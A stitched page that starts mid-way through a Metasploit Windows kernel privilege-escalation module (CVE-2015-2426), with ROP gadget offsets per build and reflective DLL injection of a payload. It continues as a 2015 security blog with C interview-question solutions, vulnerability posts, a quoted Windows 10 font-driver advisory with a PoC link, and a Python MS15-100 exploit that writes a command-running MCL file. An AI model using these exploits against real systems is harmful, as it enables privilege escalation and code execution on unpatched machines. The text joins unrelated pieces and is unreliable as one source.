      when 'ret'
        dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
      when 'mov_rax_r11_ret'
        dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
      when 'add_rax_rcx_ret'
        dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
      when 'pop_rsp_ret'
        dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
      when 'xchg_rax_rsp_adjust'
        dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
      when 'chwnd_delete'
        dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
      end
    end
  end
 
  def set_win32k_offsets
    @win32k_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17393'
        {
          'info_leak'           => 0x3cf00,
          'pop_rax_ret'         => 0x19fab,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6121,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x98156,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc432f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc4332,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6e314,  # ret C3
          'mov_rax_r11_ret'     => 0x7018e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xee38f,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbc8f,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x189a3a, # xchg esp, eax # sbb al, 0 # mov eax, ebx # add rsp, 20h # pop rbx # ret # 94 1C 00 8B C3 48 83 c4 20 5b c3
          'chwnd_delete'        => 0x165010  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17630'
        {
          'info_leak'           => 0x3d200,
          'pop_rax_ret'         => 0x19e9b,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x6024,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x84f4f,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3f7f,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3f82,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x7034e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xed33b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbb93,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x17c78c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x146EE0  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17694'
        {
          'info_leak'           => 0x3d300,
          'pop_rax_ret'         => 0x151f4,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x600c,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x2cf10,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3757,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc375a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x6682,   # pop rbx # ret # 5B C3
          'ret'                 => 0x6683,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecd7b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x71380,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x178c84, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x1513D8  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17796'
        {
          'info_leak'           => 0x3d000,
          'pop_rax_ret'         => 0x19e4f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x5f64,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x352220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a5e,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3aa7,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc3aaa,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x1B20,   # pop rbx # ret # 5B C3
          'ret'                 => 0x1B21,   # ret C3
          'mov_rax_r11_ret'     => 0x7010e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecf8b,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0x29fd3,  # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x1789e4, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x150F58  # CHwndTargetProp::Delete
 
        }
      when '6.3.9600.17837'
        {
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1a51f,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62b4,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x97a4a,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xc3687,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xc368a,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14db,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14dc,   # ret C3
          'mov_rax_r11_ret'     => 0x94871,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xecbdb,  # add rax, rcx # ret # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbd2c,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e84c, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A470  # CHwndTargetProp::Delete
        }
      when '6.3.9600.17915'
        {
          'info_leak'           => 0x3d800,
          'pop_rax_ret'         => 0x1A4EF,  # pop rax # ret # 58 C3
          'xchg_rax_rsp'        => 0x62CC,   # xchg eax, esp # ret # 94 C3
          'allocate_pool'       => 0x351220, # import entry nt!ExAllocatePoolWithTag
          'pop_rcx_ret'         => 0x9765A,  # pop rcx # ret # 59 C3
          'deref_rax_into_rcx'  => 0xC364F,  # mov rax, [rax] # mov [rcx], rax # ret # 48 8B 00 48 89 01 C3
          'mov_rax_into_rcx'    => 0xC3652,  # mov [rcx], rax # ret # 48 89 01 C3
          'pop_rbx_ret'         => 0x14DB,   # pop rbx # ret # 5B C3
          'ret'                 => 0x14DC,   # ret # C3
          'mov_rax_r11_ret'     => 0x7060e,  # mov rax, r11 # ret # 49 8B C3 C3
          'add_rax_rcx_ret'     => 0xECDCB,  # add rax, rcx # 48 03 C1 C3
          'pop_rsp_ret'         => 0xbe33,   # pop rsp # ret # 5c c3
          'xchg_rax_rsp_adjust' => 0x15e5fc, # xchg esp, eax # rol byte ptr [rcx-75h], 0c0h # add rsp, 28h # ret # 94 c0 41 8b c0 48 83 c4 28 c3
          'chwnd_delete'        => 0x15A220  # CHwndTargetProp::Delete
        }
      else
        nil
      end
    end.call(@win32k)
  end
 
  def patch_nt_offsets(dll)
    @nt_offsets.each do |k, v|
      case k
      when 'set_cr4'
        dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
      when 'allocate_pool_with_tag'
        dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
      end
    end
  end
 
  def set_nt_offsets
    @nt_offsets ||= Proc.new do |version|
      case version
      when '6.3.9600.17415'
        {
          'set_cr4'                => 0x38a3cc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2a3a50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17630'
        {
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17668'
        {
          'set_cr4'                => 0x38A3BC, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x2A3A50  # ExAllocatePoolWithTag
        }
      when '6.3.9600.17936'
        {
          'set_cr4'                => 0x3863bc, # mov cr4, rax # add rsp, 28h # ret # 0F 22 E0 48 83 C4 28 C3
          'allocate_pool_with_tag' => 0x29FA50  # ExAllocatePoolWithTag
        }
      else
        nil
      end
    end.call(@ntoskrnl)
  end
 
  def atmfd_version
    file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
 
    ver
  end
 
  def win32k_version
    file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
 
    ver
  end
 
  def ntoskrnl_version
    file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
    major, minor, build, revision, branch = file_version(file_path)
    return nil if major.nil?
    ver = "#{major}.#{minor}.#{build}.#{revision}"
    vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
 
    ver
  end
 
  def check
    # We have tested only windows 8.1
    if sysinfo['OS'] !~ /Windows 8/i
      return Exploit::CheckCode::Unknown
    end
 
    # We have tested only 64 bits
    if sysinfo['Architecture'] !~ /(wow|x)64/i
      return Exploit::CheckCode::Unknown
    end
 
    atmfd = atmfd_version
    # atmfd 5.1.2.238 => Works
    unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243')
      return Exploit::CheckCode::Safe
    end
 
    # win32k.sys 6.3.9600.17393 => Works
    @win32k = win32k_version
 
    unless @win32k && WIN32K_VERSIONS.include?(@win32k)
      return Exploit::CheckCode::Detected
    end
 
    # ntoskrnl.exe 6.3.9600.17415 => Works
    @ntoskrnl = ntoskrnl_version
 
    unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
      return Exploit::CheckCode::Unknown
    end
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    print_status('Checking target...')
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
 
    check_result = check
    if check_result == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Target not vulnerable')
    end
 
    if check_result == Exploit::CheckCode::Unknown
      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
    end
 
    if check_result == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
    end
 
    unless get_target_arch == ARCH_X86_64
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    end
 
    print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")
 
    set_win32k_offsets
    fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?
 
    set_nt_offsets
    fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?
 
    begin
      print_status('Launching notepad to host the exploit...')
      notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Sandboxes could not allow to create a new process
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
 
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
    library_path = ::File.expand_path(library_path)
 
    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    dll = ''
    ::File.open(library_path, 'rb') { |f| dll = f.read }
 
    patch_win32k_offsets(dll)
    patch_nt_offsets(dll)
 
    exploit_mem, offset = inject_dll_data_into_process(process, dll)
 
    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)
 
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Payload injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
 
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
 
end

Thursday 17 September 2015

Programming Languages Theory

Some Campus Interview Questions and Solutions

AJITH KP September 17, 2015

Hi GuyZ,
Here I'm sharing some campus interview questions and their answers. These questions are asked to my friend studying in College of Engineering, Thalassery.

Q. No. 1

Given an array of numbers and sliding window size, write a program to print maximum value in each sliding window.

Eg. Input:
Array of Numbers: 2 3 4 2 6 2 5 1
Size of sliding window: 3
Output:
4 4 6 6 6 5

Solution

#include <stdio.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
int main()
{
 int arr[256], w, n, i, j;
 printf("Enter size of array: ");
 scanf("%d", &n);
 printf("Enter %d items: ", n);
 for(i=0;i<n;i++)
 {
  scanf("%d", &arr[i]);
 }
 printf("Window size: ");
 scanf("%d", &w);
 
 for(i=0;i<n-w+1;i++)
 {
  int max=arr[i];
  for(j=i;j<i+w;j++)
  {
   if(arr[j]>max)
   {
    max = arr[j];
   }
  }
  printf("%d ", max);
 }
 printf("\n");
 return 0;
}

Q. No. 2

Given a positive value S, print all sequences with continuous numbers whose sum is S.

Eg. Input:
15
Output:
1 2 3 4 5
4 5 6
7 8
15

Solution

#include <stdio.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
#include <math.h>
int main()
{
 int n, i, j, k, x, max;
 printf("Enter number: ");
 scanf("%d", &n);
 for(i=1;i<=n;i++)
 {
  max = j = i;
  while(max<n)
  {
   max += (++j);
   //printf("%d %d\n", max, j);
  }
  if(max == n)
  {
   for(k=i;k<=j;k++)
   {
    printf("%d ", k);
   }
   printf("\n");
  }
 }
 return 0;
}

Q. No. 3

Write a program to print all subsets of given set with sum equal to given value.

Eg. Input:
Set: 3 34 4 12 5 2
Sum: 9
Output:
{4, 5}, {3, 4, 2}

Soultion

#include <stdio.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
int main()
{
 int n, arr[256], sarr[256], x, i, j, k, ind, sum;
 printf("Enter size: ");
 scanf("%d", &n);
 printf("Enter n items: ");
 for(i=0;i<n;i++)
 {
  scanf("%d", &arr[i]);
 }
 printf("Enter sum: ");
 scanf("%d", &x);
 i=1<<n;
 while(i>0)
 {
  sum = 0;
  ind = 0;
  for(j=n-1, k=0; j>=0; j--)
  {
   if(1<<j & i)
   {
    sum+=arr[k];
    sarr[ind] = arr[k];
    ind++;
   }
   k++;
  }
  i--;
  if(sum==x)
  {
   printf("{ ");
   for(k=0;k<ind-1;k++)
   {
    printf("%d ", sarr[k]);
   }
   printf("%d }\n", sarr[ind-1]);
  }
 }
 printf("\n");
 return 0;
}

Q. No. 4

Write a program to implement a function to verify whether two words are pair of anagrams.(If two words have the same characters and the occurrence number of each character is also identical respectively, they are anagrams)

Eg. Input:
silent listen
Output:
The given strings are Anagrams

Solution

#include <stdio.h>
#include <string.h>
/*

[*] Coded By Ajith Kp
[*] http://www.terminalcoders.blogspot.com

*/
int main()
{
 char str1[256], str2[256], ch;
 int i, j, n;
 printf("1st word: ");
 scanf("%s", str1);
 printf("2nd word: ");
 scanf("%s", str2);
 if(strlen(str1) != strlen(str2))
 {
  printf("The given words are not Anagrams");
 }
 else
 {
  //Sort 2 words
  for(i=0;i<strlen(str1);i++)
  {
   for(j=i;j<strlen(str1);j++)
   {
    if(str1[i]>str1[j])
    {
     ch = str1[i];
     str1[i] = str1[j];
     str1[j] = ch;
    }
   }
  }
  for(i=0;i<strlen(str2);i++)
  {
   for(j=i;j<strlen(str2);j++)
   {
    if(str2[i]>str2[j])
    {
     ch = str2[i];
     str2[i] = str2[j];
     str2[j] = ch;
    }
   }
  }
  if(strcmp(str1, str2)==0)
  {
   printf("The given words are Anagrams\n");
  }
  else
  {
   printf("The given words are not Anagrams\n");
  }
 }
}

Vulnerability

Android 5.x Lockscreen Bypass Vulnerability

AJITH KP September 17, 2015

Hello GuyZ,
Android 5.x have lockscreen bypass vulnerability. The watch the video to understand how to bypass the lockscreen security. And also Google have released the updation named 'LYM48M Android 5.1.1'.

Image from: wonderhowto.com

Video

Vulnerability

Simple Buffer Overflow Attack with Example: Video tutorial Part 2

AJITH KP September 17, 2015

I hope you have watched the previous tutorial. Else please watch from here: http://terminalcoders.blogspot.com/2015/08/simple-buffer-overflow-attack-with.html
This is the second part and explains many things about buffer overflow. This video too describes how to detect and exploit buffer overflow in windows using OllyDbg. The target program used to exploit is Cool Player.

Image from: wonderhowto.com

Video tutorial shows all steps in buffer overflow exploitation and also it shows how to write buffer overflow exploits in Python. The exploit is local exploit because it will execute only if local user tries to play the malicious MP3 file using Cool Player.

Video

Wednesday 16 September 2015

Windows

Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation

AJITH KP September 16, 2015

After the detection of RCE Vulnerability in Windows 7, Windows 10 is also under some serious vulnerabilities. The new vulnerability detected in Windows 10 is 'permission privilege escalation'.

POC

Source: https://code.google.com/p/google-security-research/issues/detail?id=468
Windows: User Mode Font Driver Thread Permissions EoP
Platform: Windows 10 Build 10130
Class: Elevation of Privilege
Summary:
The host process for the UMFD runs as a normal user but with a heavily restrictive process DACL. It’s possible execute arbitrary code within the context of the process because it’s possible to access the processes threads leading to local EoP.
Description:
NOTE: This was tested on the latest available build on Windows 10. I don’t know if the final version will change the functionality to fix this vulnerability.
When a custom font is used in Windows 10 the User Mode Font Driver comes into play. This is initialized by a call from the kernel into the user sessions winlogon process which in turn spawns a new copy of fontdrvhost.exe. The process is started inside an appcontainer heavily restricting what resources it could access if a font bug was able to compromise it. However win32k exposes some additional calls to the UMFD for its own purposes, some of which are potentially dangerous. For that reason (presumably) winlogon creates the process with a specific DACL limiting access to the process and initial thread to SYSTEM only.
There’s a few problems with this approach, firstly it’s still running in the context of the user and includes the user’s environment variables such as PATH. This might mean if any badly written code later relies on the drive mapping or PATH there could be issues. More serious however is the specified DACL only applies to the process object and the initial thread object, but not to any subsequent thread. Therefore those threads get the default DACL from the process token (which is never changed) and are marked as owned by the current user, so the DACL could be rewritten anyway. This is a problem as with write access to the threads it’s possible to change their context and redirect execution to an arbitrary location. As the token is a lowbox token this can even be done in low integrity processes such as IE PM.
The exploitation is made trickier by the fact that you can’t directly read or write the process’ memory. Still one thing you could do is redirect the thread to LoadLibraryW and pass it the known address of a string. This can either be a string in a loaded library and rely on the path environment variable to allow it to be resolved or in something like the GDI heap.
Once in the UMFD process you can then send some of the specific Win32k escape codes. For example there’s one currently called UmfdEscEngCreateFile which will open (for read or write) a couple of files in system32. The open is done in kernel mode, with no forced access check (even though an impersonation is performed) and the handle returned to user mode. This is dangerous for a number of reasons, specifically that the NTFS driver will mark the file as having create symbolic link permissions because it’s opened in kernel mode which means the caller could set a file symbolic link. Then it could reopen the file and it would be able create an arbitrary file on disk. This hasn’t been completely tested however but it’s an example of a dangerous call, of course it could just be a vestigial feature which will be removed in release builds as the code is pretty dangerous and doesn’t even work as expected.
This issue could probably be fixed in a few ways, firstly the default token DACL should be set so that it maintains the security, assuming this is possible. Also you’d probably need to set OWNER_RIGHTS SID otherwise the user could just open the thread and rewrite its DACL. Also not using the actual user’s environment would probably be a good idea although not necessarily a complete fix. Finally presumably the process mitigation to only allow signed modules could be enabled which would complicate exploitation especially in the presence of CFG.
Proof of Concept:
I’ve provided a PoC which just crashes the fontdrvhost process at a predictable address. It’s only built for 32 bit version of Windows 10 but presumably it would work on 64 bit version as well. The password for the archive is &amp;amp;amp;quot;password&amp;amp;amp;quot;.
1) Copy the PoC to a directory
2) Execute the PoC, if it wasn’t already a new instance of fontdrvhost.exe should have started. You might want to attach a debugger at this point.
3) Click the Do Exploit button, if at this point the fontdrvhost process doesn’t crash open a new copy of the PoC just to kick the threads inside the process.
Expected Result:
It’s not possible to influence the fontdrvhost process.
Observed Result:
Thread execution redirected to an arbitrary address of 0x55555555.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38198.zip

Saturday 12 September 2015

Vulnerability

Windows Media Center - Command Execution (MS15-100) Vulnerability

Ajith KP September 12, 2015

Hello GuyZ,

The Windows 7 is under command execution vulnerability. Windows Media Center is vulnerable to command execution attack. The exploit is written by R-73eN.

Exploit Link: http://0day.today/exploit/description/24239

Before Running evil MCL file

After Running evil MCL file

Source Code

# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
  
  
banner = ""
banner += " ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
  
command = "calc.exe"
evil = '<application run="' + command + '"/>'
f = open("Music.mcl","w")
f.write(evil)
f.close()
print "\n[+] Music.mcl generated . . . [+]"